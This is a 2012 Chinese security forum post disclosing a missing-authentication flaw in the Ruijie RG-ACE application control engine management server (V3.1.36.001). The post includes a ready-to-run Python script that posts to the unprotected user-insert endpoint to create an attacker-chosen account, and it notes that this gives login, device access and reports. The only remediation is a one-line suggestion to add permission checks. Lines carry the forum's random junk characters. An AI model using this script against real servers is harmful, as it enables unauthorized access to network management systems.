找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1947|回复: 0
打印 上一主题 下一主题

锐捷应用控制引擎管理服务器可以增加用户

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:16:32 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)/ Z% F3 b6 _* J) q' g) D# c
1 _$ G. Z- L1 k

2 K* o# ]: f$ ^' S' C) R& |测试的具体版本是# E' m0 g+ k0 Y+ E$ D+ e
产品名称: 锐捷应用控制引擎
* G) ^" \" _$ k% g, `版本号: 3.1.36.001 TC' B! f4 t8 y* s
编译时间: 201104291730
7 b1 y: l# Y3 m, L& e! R 4 Z2 H7 x; U9 W* A& d
3 O! v* E0 D2 q' D) Z/ {7 s% [
漏洞证明:
0 }/ p) m3 ^9 _  C & j: z" B, z# W

0 R9 J' B# O0 O5 [2 D. T6 q4 ~( U- s, x" @

: D- }5 A! G4 B* |  J. y) B9 z4 W. v) _  q0 e, a

% {3 |8 J5 ?. T执行脚本% o! U" o1 q# T4 }0 r! U
#! /usr/bin/env python
( d/ y% R$ A0 ~) q0 o#coding=gbk  r# M- h  y$ _7 W8 D0 n6 U; _0 o: v
#RG-ACE管理服务器 V3.1.36.0019 p7 l2 ^* n. q( |& Q" l: g- ~
import urllib2, urllib,cookielib
9 w* \3 q* e' B/ a; I$ k4 U" h9 Y* G; Nurl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP( @# W1 B8 v3 D6 [- m0 ~& D
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))3 x7 H: a+ O; _
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]( Q7 B) V* a) Y4 Z! Z
post=(("event","userManager.doInsertUserInfo"),+ g- r* {: Q9 M/ \8 y' |
("useractionname","addButtonValue"),1 ^0 A* D3 q; Y1 L" s( h4 b; ]+ Y$ H0 G
("useropermanager","userManager"),
$ e9 |% H3 D& f) o) T7 _("userName","t"), #######账号自己加
  H+ H! W( r4 M("pwd","aaaaaa"),######密码自己加! R. P1 K+ |3 ^6 N# w, ?
("trueName","ad"),+ ?/ c2 ]/ _& A7 o
("email",""),
/ o# R) T. g$ P$ U3 |("mobilePhone",""),
, @' x# Y; y% K+ ]( S$ u2 j("officePhone",""),
# _# u9 n1 i1 y! Y( I1 T  y("addr",""),
- v3 I8 m6 J! {2 X# j  l: ?) M; [' H("submit","确定"))
" Q7 G6 x' A0 B' B9 ^$ e8 Rurllib2.install_opener(opener)4 u& u- q- O/ Y; O
p=urllib2.urlopen(url, urllib.urlencode(post)).read()
( R0 N+ L/ ]: m& m7 eprint "Done": w- r0 m& R- Q
/ {+ a6 Y$ J3 g2 U8 s: m
登录,连接设备( C$ U% i; c3 [: I) \0 Z

8 Z- l6 s& u) _* W
$ s# A" x7 N& K5 }& p' G5 S
2 A* P6 q) j5 p/ P9 i  z0 ~( V& G1 A) v+ w

; d8 u; Y# x9 a0 ~# u' p+ R8 Y默认的管理员admin权限更大点7 S* l1 U( v/ W2 f4 L* I

( _% P1 w! z/ ]1 u
) f$ [/ p9 x4 Z" _/ m/ t
4 W. l: j! F8 z) D % Z  L* z3 \$ C6 ?% v' S0 y: P0 t

( \( {. O5 ]4 J  ]2 `7 t5 J; H8 n' Y修复方案:: o, E' u* f: L* s
加强对接口的权限验证! r, C6 t) e( |! w0 Y, o3 E. d
6 y: ~  O7 k' [, k3 \; [: m7 V+ H
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表